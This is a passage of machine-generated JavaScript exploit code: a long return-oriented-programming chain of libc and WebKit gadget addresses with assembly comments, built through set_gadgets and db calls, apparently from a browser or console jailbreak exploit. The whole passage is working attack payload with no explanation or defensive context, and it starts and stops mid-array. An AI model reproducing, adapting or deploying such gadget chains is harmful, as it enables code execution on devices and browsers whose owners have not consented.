webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L6719: db([0, 0]); // 0x0 set_gadgets([ ropchain+335400, //L6719+24 ropchain+335416, //L6714 libc_base+782311, //pop rsp ropchain+342280, //L6720 //L6714: libc_base+782311, //pop rsp ropchain+343992, //L6721 //L6600: libc_base+764760, //pop rsi ropchain+335472, //L6722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6722: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6724: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+335592, //L6727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+335576, //L6725 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6725: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6727: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+335768, //L6730 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+335784, //L6731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+335736, //L6728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+335752, //L6729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6728: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6729: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6730: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6731: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+335880, //L6733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+335864, //L6732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6732: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6733: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L6734: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L6735: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L6736: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov 
rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+336080, //L6738 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6738: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+336136, //L6739 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6739: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+336272, //L6743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+336256, //L6742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6741: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6742: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6743: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+336336, //L6744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6744: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6746: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L6748: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+336496, //L6751 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+336480, //L6749 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6749: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6751: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+336640, //L6754 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+336608, //L6752 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+336624, //L6753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6752: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6753: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6754: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+336728, //L6756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L6755: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L6756: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+336784, //L6757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6757: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6759: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+336864, //L6761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6761: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+336960, //L6763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6762: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6763: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6764: db([1, 0]); // 0x1 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+337040, //L6765 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6765: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6767: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+337120, //L6769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6769: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+344232, //L6768 //L6630: libc_base+764760, //pop rsi ropchain+337184, //L6771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6771: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6773: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+337304, //L6776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+337288, //L6774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6774: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6776: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+337480, //L6779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+337496, //L6780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+337448, //L6777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+337464, //L6778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6777: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6778: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6779: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6780: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+337592, //L6782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+337576, //L6781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6781: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6782: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L6783: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L6784: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L6785: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+337792, //L6787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6787: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760, //pop rsi ropchain+337848, //L6788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6788: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+337984, //L6792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+337968, //L6791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6790: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6791: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6792: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+338048, //L6793 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6793: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6795: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L6797: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+338208, //L6800 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+338192, //L6798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6798: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6800: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+338352, //L6803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop 
rsi ropchain+338320, //L6801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+338336, //L6802 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6801: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6802: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6803: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+338440, //L6805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L6804: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L6805: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+338496, //L6806 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6806: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6808: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+338576, //L6810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6810: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+338672, //L6812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6811: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6812: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6813: db([1, 0]); // 0x1 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, 
//pop rsi ropchain+338752, //L6814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6814: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6816: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+338832, //L6817 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6817: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+344232, //L6768 //L6660: libc_base+764760, //pop rsi ropchain+338896, //L6819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6819: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6821: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+339016, //L6824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+339000, //L6822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6822: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6824: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+339192, //L6827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+339208, //L6828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+339160, //L6825 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+339176, //L6826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6825: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); 
//pop r9 //L6826: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6827: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6828: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+339304, //L6830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+339288, //L6829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6829: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6830: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L6831: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L6832: db([2, 0]); // 0x2 set_gadget(libc_base+763368,); //pop rcx //L6833: db([2, 0]); // 0x2 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+339504, //L6835 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6835: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+339560, //L6836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6836: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+339696, //L6840 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+339680, //L6839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6838: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6839: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6840: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+339760, //L6841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6841: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6843: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L6845: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+339920, //L6848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+339904, //L6846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6846: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6848: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+340064, //L6851 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+340032, //L6849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+340048, //L6850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6849: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6850: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6851: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+340152, //L6853 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L6852: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L6853: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+340208, //L6854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6854: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6856: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+340288, //L6858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6858: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+340384, //L6860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6859: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6860: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6861: db([1, 0]); // 0x1 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+340464, //L6862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6862: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6864: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+340544, //L6865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6865: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+344232, //L6768 //L6690: libc_base+764760, //pop rsi ropchain+340608, //L6867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6867: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6869: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+340728, //L6872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+340712, //L6870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6870: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6872: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+340904, //L6875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+340920, //L6876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+340872, //L6873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+340888, //L6874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6873: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6874: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6875: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6876: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+341016, //L6878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+341000, //L6877 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6877: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6878: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L6879: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L6880: db([3, 0]); // 0x3 set_gadget(libc_base+763368,); //pop rcx //L6881: db([3, 0]); // 0x3 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+341216, //L6883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6883: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+341272, //L6884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6884: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+341408, //L6888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+341392, //L6887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6886: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6887: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6888: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl 
